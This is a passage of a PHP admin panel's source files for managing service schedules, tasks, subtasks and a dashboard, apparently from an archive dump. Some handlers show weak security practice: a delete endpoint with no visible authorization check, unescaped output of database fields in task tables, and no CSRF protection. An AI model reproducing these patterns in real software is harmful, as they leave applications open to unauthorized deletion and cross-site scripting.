Task('', $schedule_id, $service_id, $frequency,$dates, $currentUser, $currentUser, $created_at,$updated_at, false, null, false, false, false, null, null, false); if ($taskService->addTask($task)) { echo "Task added successfully!"; } else { echo "Failed to add task."; } } else { echo "Invalid request method."; } ?> emeraadmin/submit_service.php000064400000002561151676701240012417 0ustar00<?php require_once '../../Classes/Service.php'; require_once '../../Service/ServiceService.php'; function validate_decimal($value) { if (is_numeric($value)) { return (float) $value; } return NULL; // Default to NULL if not a valid number } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $name = $_POST['name']; $region = $_POST['region']; $address_line1 = $_POST['address_line1']; $address_line2 = $_POST['address_line2']; $suburb = $_POST['suburb']; $city = $_POST['city']; $state = $_POST['state']; $postal_code = $_POST['postal_code']; $country = $_POST['country']; //decimal value of latitude and longitude $latitude = isset($_POST['latitude']) ? validate_decimal($_POST['latitude']) : NULL; $longitude = isset($_POST['longitude']) ? validate_decimal($_POST['longitude']) : NULL; $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $serviceService = new ServiceService(); $service = new Service("", $name, $region, $address_line1, $address_line2, $suburb, $city, $state, $postal_code, "Australia", "", "", "", "", $created_at, $updated_at); if ($serviceService->addService($service)) { echo "Service added successfully!"; } else { echo "Failed to add service."; } } else { echo "Invalid request method."; } ?> emeraadmin/reports.php000064400000012043151676701240011066 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; // Initialize necessary services and classes $System = new System(); $subtaskService = new SubtaskService(); $userService = new UserService(); ?> <style> .card { height: 300px; /* Increase the height of the cards */ border-radius: 15px; /* Add rounded corners */ margin-bottom: 20px; /* Add space between the cards */ } .card-body { height: 200px; display: flex; flex-direction: column; justify-content: center; } </style> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Reports</h5> <span>Navigate to different reports</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="../../index.html"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Reports</a></li> <li class="breadcrumb-item active" aria-current="page">View Reports</li> </ol> </nav> </div> </div> <div class="row mt-20"> <!-- First card --> <div class="col-md-6"> <a href="report_subtaks_datewise.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-file-text" style="font-size: 2em;"></i> <h5 class="card-title">Date Wise Subtasks</h5> <p class="card-text">View subtasks grouped by date</p> </div> </a> </div> <!-- Second card --> <div class="col-md-6"> <a href="report_tasksAssignedToUsers.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-users" style="font-size: 2em;"></i> <h5 class="card-title text-center">Tasks Assigned to Users</h5> <p class="card-text">View tasks categorized by assigned users</p> </div> </a> </div> </div> <div class="row mt-20"> <!-- Third card --> <div class="col-md-6"> <a href="report_rejectedtasksvyusers.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-x-circle" style="font-size: 2em;"></i> <h5 class="card-title text-center">Rejected Tasks by Users</h5> <p class="card-text">View rejected tasks categorized by assigned users</p> </div> </a> </div> <!-- Fourth card --> <div class="col-md-6"> <a href="reports_acceptedtasksbyusers.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-trending-up" style="font-size: 2em;"></i> <h5 class="card-title">Accepted Tasks by Users</h5> <p class="card-text">View accepted tasks categorized by assigned users</p> </div> </a> </div> </div> <div class="row mt-20 h-100"> <!-- Fifth card --> <div class="col-md-6"> <a href="report_TaskSummaryForUsers.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-list" style="font-size: 2em;"></i> <h5 class="card-title text-center">Task Summary for Each Subcontractor</h5> <p class="card-text">View summary of tasks for each subcontractor</p> </div> </a> </div> <!-- Sixth card --> <div class="col-md-6"> <a href="report_subtaskswithnotes.php" class="card text-center h-100"> <div class="card-body"> <i class="ik ik-file-text" style="font-size: 2em;"></i> <h5 class="card-title"> Subtasks with Notes</h5> <p class="card-text"> View subtasks with notes</p> </div> </a> </div> </div> </div> </div> <?php include('footer.php'); ?> emeraadmin/viewschedules.php000064400000034531151676701240012250 0ustar00<?php include('head.php'); // Include database connection and ScheduleService class require_once '../../Service/ScheduleService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create ScheduleService instance $scheduleService = new ScheduleService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (isset($_GET['completed'])) { $filters['completed'] = $_GET['completed']; } if (!empty($_GET['date_from'])) { $filters['date_from'] = $_GET['date_from']; } if (!empty($_GET['date_to'])) { $filters['date_to'] = $_GET['date_to']; } } // Fetch schedules from the database based on filters $schedules = $scheduleService->getAllSchedules($filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Schedules</h5> <span>View all schedules</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Schedules</a> </li> <li class="breadcrumb-item active" aria-current="page">View Schedules</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#exampleModalCenter"> <i class="ik ik-plus"></i> Create Schedule </button> </div> <div class="card-header-right"> </div> </div> </div> </div> </div> <!-- Filter Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Filter Schedules</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="completed">Completed</label> <select class="form-control" id="completed" name="completed"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['completed']) && $_GET['completed'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['completed']) && $_GET['completed'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> <div class="form-group col-md-2"> <label for="date_from">Date From</label> <input type="date" class="form-control" id="date_from" name="date_from" value="<?php echo htmlspecialchars($_GET['date_from'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="date_to">Date To</label> <input type="date" class="form-control" id="date_to" name="date_to" value="<?php echo htmlspecialchars($_GET['date_to'] ?? ''); ?>"> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="viewschedules.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Filter Form --> <div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Add a new schedule</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <form id="scheduleForm" class="forms-sample"> <div class="form-group"> <label for="schedule-name">Schedule Name:</label> <input type="text" id="schedule-name" name="schedule-name" class="form-control" required placeholder="Enter schedule name"> </div> <div id="message" class="mt-3"></div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" form="scheduleForm" class="btn btn-primary">Add Schedule</button> </div> </div> </div> </div> <script> document.getElementById('scheduleForm').addEventListener('submit', function (event) { event.preventDefault(); const formData = new FormData(this); fetch('submit_schedule.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { const messageDiv = document.getElementById('message'); messageDiv.textContent = data; messageDiv.classList.add('alert', 'alert-success'); Swal.fire({ title: 'Success!', text: data, icon: 'success', confirmButtonText: 'Ok' }).then(() => { location.reload(); }); document.getElementById('scheduleForm').reset(); }) .catch(error => { const messageDiv = document.getElementById('message'); messageDiv.textContent = 'Error: ' + error; messageDiv.classList.add('alert', 'alert-danger'); Swal.fire({ title: 'Error!', text: error, icon: 'error', confirmButtonText: 'Ok' }); }); }); </script> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Schedule Name</th> <th>Completed</th> <th>Created By</th> <th>Created At</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (!empty($schedules)): ?> <?php foreach ($schedules as $schedule): ?> <tr> <td><?php echo 'SCH-000' . $schedule->id; ?></td> <td><?php echo htmlspecialchars($schedule->schedule_name); ?></td> <td><?php echo ($schedule->completed ? '<label class="badge badge-success">Completed</label>' : '<label class="badge badge-danger">Not Completed</label>'); ?></td> <td><?php echo htmlspecialchars($schedule->created_by); ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($schedule->created_at)); ?></td> <td> <a href="viewscheduletasks.php?id=<?php echo $System->encryptData($schedule->id) ?>" class="btn btn-primary">View Tasks</a> <button type="button" class="btn btn-icon btn-danger delete-schedule" data-schedule-id="<?php echo $System->encryptData($schedule->id); ?>"> <i class="ik ik-trash-2"></i> </button> </td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="6">No schedules found.</td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <script> document.addEventListener('DOMContentLoaded', function() { var deleteButtons = document.querySelectorAll('.delete-schedule'); deleteButtons.forEach(function(button) { button.addEventListener('click', function() { var scheduleId = button.getAttribute('data-schedule-id'); Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { // Create a fake hidden password input to trick autofill let fakePasswordInput = document.createElement('input'); fakePasswordInput.setAttribute('type', 'password'); fakePasswordInput.setAttribute('style', 'display:none;'); document.body.appendChild(fakePasswordInput); // Prompt for password Swal.fire({ title: 'Enter your password', input: 'password', showCancelButton: true, confirmButtonText: 'Submit', inputPlaceholder: 'Password', inputAttributes: { 'autocomplete': 'new-password', // Set to "new-password" to trick autofill 'autocapitalize': 'off', 'autocorrect': 'off', 'autofocus': 'true' } }).then((passwordResult) => { if (passwordResult.isConfirmed) { var password = passwordResult.value; var xhr = new XMLHttpRequest(); xhr.open('POST', 'delete_schedule.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { if (xhr.responseText === 'success') { Swal.fire({ title: 'Deleted!', text: 'The schedule has been deleted.', icon: 'success' }).then(() => { location.reload(); // Refresh the page }); } else { Swal.fire({ title: 'Error!', text: xhr.responseText, icon: 'error' }); } } }; xhr.send('scheduleId=' + scheduleId + '&password=' + encodeURIComponent(password)); } }); } }); }); }); }); </script> <?php include('footer.php'); ?> emeraadmin/delete_subtask.php000064400000001021151676701240012360 0ustar00<?php // Include necessary files and instantiate objects require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; $subTaskService = new SubtaskService(); // Check if subtask ID is provided via POST if (isset($_POST['subtaskId'])) { $subtaskId = $_POST['subtaskId']; // Perform deletion of subtask if ($subTaskService->deleteSubtaskById($subtaskId)) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_request'; } ?> emeraadmin/viewscheduletasks.php000064400000076612151676701240013141 0ustar00<?php include('head.php'); ?> <?php // Get schedule ID from URL parameter $schedule_id = $_GET['id']; // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; // Create ServiceService instance $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $System = new System(); $schedule_id = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$schedule_id) { echo "<script> Swal.fire({ title: 'Invalid Schedule ID', text: 'The URL parameter is invalid. Please go back and try again.', icon: 'error', confirmButtonText: 'OK' }).then(() => { window.location.href = 'viewschedules.php'; }); </script>"; exit; } // Fetch tasks from the database that belong to the given schedule $tasks = $taskService->getTasksByScheduleId($schedule_id); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Tasks</h5> <span>View tasks for the selected schedule</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Schedules</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> <!-- <a href="createtasks.php?schedule_id=--> <?php //echo $schedule_id; ?><!--" class="btn btn-outline-primary">Add Task</a>--> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#createTaskModal"><i class="ik ik-plus"></i>Create Task </button> </div> </div> </div> </div> </div> <div class="modal fade" id="createTaskModal" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-xl mt-0 mb-0" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Add a Task</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <form id="tasksForm"> <div class="row"> <div class="col-md-6"> <div class="form-group row"> <div class="col-sm-9"> <input type="text" id="schedule-id" name="schedule-id" class="form-control" value="<?php echo $schedule_id; ?>" <?php echo isset($schedule_id) ? 'readonly' : ''; ?> hidden> </div> </div> <div class="form-group row"> <label for="service-id" class="col-sm-3 col-form-label">Service:</label> <div class="col-sm-9"> <select id="service-id" name="service-id" class="form-control select2"></select> </div> </div> <input type="hidden" name="current-user" value="<?php echo $_SESSION['user_id']; ?>"> <script> document.addEventListener('DOMContentLoaded', function () { var services = <?php echo json_encode($services); ?>; var serviceSelect = document.getElementById("service-id"); services.forEach(service => { var option = document.createElement("option"); option.value = service.id; // Use service ID as value option.textContent = service.name; // Show service name serviceSelect.appendChild(option); }); }); </script> <div class="form-group row"> <label for="frequency" class="col-sm-3 col-form-label">Frequency:</label> <div class="col-sm-9"> <select id="frequency" name="frequency" class="form-control select2 frequencySelect"> <option value="daily">Daily</option> <option value="3x/week">3x/week</option> </select> </div> </div> </div> <input type="text" id="dates" name="dates" hidden> <div class="col-md-6"> <div class="d-flex flex-column"> <h1>Select Dates</h1> <div class="date-picker"></div> <div class="date-time-container"></div> </div> </div> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" form="tasksForm" class="btn btn-primary">Add Task</button> </div> </div> </div> </div> <script src="../../node_modules/flatpickr/dist/flatpickr.js"></script> <script> document.addEventListener('DOMContentLoaded', function () { initializeFlatpickr(); }); function initializeFlatpickr() { $('.date-picker').each(function () { flatpickr(this, { dateFormat: "Y-m-d", mode: "multiple", inline: true, onChange: function (selectedDates, dateStr, instance) { const container = $(instance.element).closest('.d-flex').find('.date-time-container'); const existingDateTimePairs = []; container.find('.form-group').each(function () { const date = $(this).find('input[type="text"]').first().val(); const time = $(this).find('.time-picker').val(); existingDateTimePairs.push({ date, time }); }); selectedDates.sort((a, b) => new Date(a) - new Date(b)); container.empty(); selectedDates.forEach((date) => { const formattedDate = formatDate(date); let timeValue = ''; existingDateTimePairs.forEach(pair => { if (pair.date === formattedDate) { timeValue = pair.time; } }); container.append(` <div class="form-group mb-2 mr-sm-2 mb-sm-0"> <input type="text" class="form-control" value="${formattedDate}" readonly> <input type="text" class="form-control time-picker" placeholder="Select Time" value="${timeValue}"> </div> `); }); initializeTimePicker(container); } }); }); } function initializeTimePicker(container) { container.find('.time-picker').each(function () { flatpickr(this, { enableTime: true, noCalendar: true, dateFormat: "H:i", }); }); } function formatDate(date) { const year = date.getFullYear(); const month = (date.getMonth() + 1).toString().padStart(2, '0'); const day = date.getDate().toString().padStart(2, '0'); return `${year}-${month}-${day}`; } document.getElementById('tasksForm').addEventListener('submit', function (event) { event.preventDefault(); // Collect date-time pairs const dateTimePairs = []; document.querySelectorAll('.date-time-container .form-group').forEach(group => { const date = group.querySelector('input[type="text"]').value; const time = group.querySelector('.time-picker').value; dateTimePairs.push({ date, time }); }); // Set the dates field value document.getElementById('dates').value = JSON.stringify(dateTimePairs); // Validate dates if (dateTimePairs.length === 0) { Swal.fire({ title: 'Error', text: 'Please select dates', icon: 'error', confirmButtonText: 'OK' }); return; } // Collect form data const formData = new FormData(this); // Send form data via fetch fetch('submit_task.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { // Reset form fields document.getElementById('service-id').value = ''; document.getElementById('frequency').value = ''; document.querySelector('.date-time-container').innerHTML = ''; // Show success message Swal.fire({ title: 'Task Created', text: data, icon: 'success', confirmButtonText: 'OK' }).then(() => { location.reload(); }); }) .catch(error => { // Show error message Swal.fire({ title: 'Error', text: error, icon: 'error', confirmButtonText: 'OK' }); }); }); function populateRegion() { var selectedService = document.getElementById('service-name').value; var selectedServiceData = <?php echo json_encode($services); ?>; var regionSelect = document.getElementById('region'); regionSelect.innerHTML = ''; selectedServiceData.forEach(service => { if (service.name === selectedService) { var regionOption = document.createElement('option'); regionOption.value = service.region; regionOption.textContent = service.region; regionSelect.appendChild(regionOption); } }); } populateRegion(); </script> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <h3>View Tasks</h3> </div> <div class="card-header-right"> <!-- <button id="download_excel" class="btn btn-success">Export to Excel</button>--> </div> </div> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group row"> <div class="col-sm-2"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> </div> <div class="col-sm-9"> <input type="text" class="form-control" id="filter_service"> </div> </div> <div class="form-group row"> <div class="col-sm-3"> <div class="row"> <div class="col-sm-3"> <label for="filter_region" class="col-form-label">Filter Region:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> </div> </div> <div class="col-sm-2"> <div class="row"> <div class="col-sm-3"> <label for="filter_finished" class="col-form-label">Filter Finished:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_finished"> <option value="">All</option> <option value="Not Finished">Not Finished.</option> <option value="Finished.">Finished.</option> </select> </div> </div> </div> <div class="col-sm-2"> <div class="row"> <div class="col-sm-3"> <label for="filter_assigned" class="col-form-label">Filter Assigned:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_assigned"> <option value="">All</option> <option value="Not Assigned">Not Assigned.</option> <option value="Assigned.">Assigned.</option> </select> </div> </div> </div> <div class="col-sm-2"> <div class="row"> <div class="col-sm-3"> <label for="filter_public" class="col-form-label">Filter Public:</label> </div> <div class="col-sm-9"> <select class="form-control" id="filter_public"> <option value="">All</option> <option value="Not Public">Not Public</option> <option value="Public.">Public.</option> </select> </div> </div> </div> <!-- reset filters button--> <div class="col-sm-3"> <!-- <label for="reset_filters" class="col-form-label">Reset Filters:</label>--> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Add other filters as per your requirements --> </div> </div> <table id="superadvanced_table" class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created By</th> <th>Created At</th> <th>Finished</th> <th>Assigned</th> <th>Assigned To</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000' . $task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo $task->created_by_name; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td><?php echo($task->finished ? '<label class="badge badge-success">Finished.</label>' : '<label class="badge badge-warning">Not Finished</label>'); ?></td> <td><?php echo($task->is_assigned ? '<label class="badge badge-success">Assigned.</label>' : '<label class="badge badge-warning">Not Assigned</label>'); ?></td> <td><?php echo $task->assigned_to_name; ?></td> <td><?php echo($task->isPublic ? '<label class="badge badge-warning">Public.</label>' : '<label class="badge badge-success">Not Public</label>'); ?></td> <td> <a href="viewtask.php?id=<?php echo $System->encryptData($task->id); ?>" class="btn btn-primary">View Details</a> <?php if ($task->is_assigned == 0): ?> <button class="btn btn-danger delete-task" data-task-id="<?php echo $System->encryptData($task->id); ?>">Remove </button> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <script> document.addEventListener('DOMContentLoaded', function () { // Initialize DataTable var table = $('#superadvanced_table').DataTable({ // Configure initial settings if needed }); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val(), finished: $('#filter_finished').val(), assigned: $('#filter_assigned').val(), public: $('#filter_public').val() }; localStorage.setItem('taskFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('taskFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); $('#filter_finished').val(filters.finished).trigger('change'); $('#filter_assigned').val(filters.assigned).trigger('change'); $('#filter_public').val(filters.public).trigger('change'); } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); $('#filter_finished').val('').trigger('change'); $('#filter_assigned').val('').trigger('change'); $('#filter_public').val('').trigger('change'); localStorage.removeItem('taskFilters'); table.search('').columns().search('').draw(); } function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); //console.log('Previous URL:', previousUrl); if (!previousUrl || !previousUrl.includes('viewtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(1).search($(this).val()).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(2).search($(this).val()).draw(); saveFilters(); }); $('#filter_finished').on('change', function () { table.column(6).search($(this).val()).draw(); saveFilters(); }); $('#filter_assigned').on('change', function () { table.column(7).search($(this).val()).draw(); saveFilters(); }); $('#filter_public').on('change', function () { table.column(9).search($(this).val()).draw(); saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); applyFilters(); }); </script> <script> // Delete task functionality (unchanged) var deleteButtons = document.querySelectorAll('.delete-task'); deleteButtons.forEach(function (button) { button.addEventListener('click', function () { var taskId = button.getAttribute('data-task-id'); Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'delete_task.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { if (xhr.responseText === 'success') { Swal.fire({ title: 'Deleted!', text: 'Your task has been deleted.', icon: 'success' }).then(() => { window.location.reload(); }); } else { Swal.fire({ title: 'Error!', text: xhr.responseText, icon: 'error' }); } } }; xhr.send('taskId=' + taskId); } }); }); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> emeraadmin/dashboard.php000064400000037572151676701240011335 0ustar00<?php include('head.php'); require_once '../../Service/ReportsAndDashboardService.php'; $reportsAndDashboardService = new ReportsAndDashboardService(); $services = $reportsAndDashboardService->getServicesCount(); $tasks = $reportsAndDashboardService->getTasksCount(); $assignedTasks = $reportsAndDashboardService->getAssignTasksCount(); $contracts = $reportsAndDashboardService->getContractorsCount(); $subtasks = $reportsAndDashboardService->getSubtasks(); // Fetch completed and incomplete subtask summary data $subtasksSummary = $reportsAndDashboardService->getSubtasksSummaryAdmin(); $completedSubTasks = $subtasksSummary['completed']; $incompleteSubTasks = $subtasksSummary['incomplete']; $ongoingSubTasks = $completedSubTasks + $incompleteSubTasks; // Calculating ongoing subtasks // Fetch total finished and not finished task summary data $taskSummary = $reportsAndDashboardService->getTasksSummaryAdmin(); $completedTasks = $taskSummary['completed']; $incompleteTasks = $taskSummary['incomplete']; $ongoingTasks = $taskSummary['ongoing']; $todaySubtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForTodayAdmin(date('Y-m-d')); $todayTotalSubTasks = $todaySubtasksSummary['total']; $todayCompletedSubTasks = $todaySubtasksSummary['completed']; $todayIncompleteSubTasks = $todaySubtasksSummary['incomplete']; ?> <div class="main-content"> <div class="container-fluid"> <div class="row grid-layout"> <!-- Ongoing, Completed, Incomplete Subtasks and Chart --> <div class="col-md-8"> <div class="card"> <div class="card-header"> <h3>Overall Subtasks Summary</h3> </div> <div class="card-body"> <div class="row"> <div class="col-md-6"> <div class="widget bg-primary"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Ongoing Subtasks</h6> <h2><?php echo $ongoingSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-box"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?php echo $completedSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-shopping-cart"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?php echo $incompleteSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-inbox"></i> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card-body text-center"> <canvas id="subtasksPieChart" style="height: 370px; width: 100%;"></canvas> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header"> <h3>Today's Subtasks Summary: <?php echo date('l, F j, Y'); ?></h3> </div> <div class="card-block"> <div class="row"> <div class="col-md-6"> <div class="widget bg-info"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Total Subtasks to be Completed</h6> <h2><?php echo $todayTotalSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-calendar"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?php echo $todayCompletedSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-check-circle"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?php echo $todayIncompleteSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-alert-circle"></i> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card-block text-center"> <canvas id="todaySubtasksDoughnutChart" style="height: 370px; width: 100%;"></canvas> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="widget bg-danger"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Sub Contractors</h6> <h2><?php echo $contracts->count; ?></h2> </div> <div class="icon"> <i class="ik ik-users"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Services</h6> <h2><?php echo $services->count; ?></h2> </div> <div class="icon"> <i class="ik ik-map-pin"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Assigned Tasks</h6> <h2><?php echo $assignedTasks->count; ?></h2> </div> <div class="icon"> <i class="ik ik-check-circle"></i> </div> </div> </div> </div> <div class="widget bg-primary"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Unassigned Tasks</h6> <h2><?php echo $tasks->count; ?></h2> </div> <div class="icon"> <i class="ik ik-calendar"></i> </div> </div> </div> </div> <div class="card sale-card"> <div class="card-header"> <h3>Completed Subtasks</h3> </div> <div class="card-block"> <div id="subtask-chart" class="chart-shadow" style="height:300px"></div> </div> </div> </div> </div> </div> </div> <script src="https://www.amcharts.com/lib/3/amcharts.js"></script> <script src="https://www.amcharts.com/lib/3/serial.js"></script> <script src="https://www.amcharts.com/lib/3/themes/light.js"></script> <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> <script src="https://canvasjs.com/assets/script/canvasjs.min.js"></script> <script> var chartData = [ <?php foreach ($subtasks as $subtask): ?> { "date": "<?php echo $subtask->completed_at; ?>", "completed_subtasks": <?php echo $subtask->completed_subtasks; ?> }, <?php endforeach; ?> ]; var chart = AmCharts.makeChart("subtask-chart", { "type": "serial", "theme": "light", "dataDateFormat": "YYYY-MM-DD", "precision": 2, "valueAxes": [{ "id": "v1", "position": "left", "autoGridCount": false, "labelFunction": function (value) { return value + " tasks"; } }], "graphs": [{ "id": "g1", "valueAxis": "v1", "bullet": "round", "bulletBorderAlpha": 1, "bulletColor": "#FFFFFF", "bulletSize": 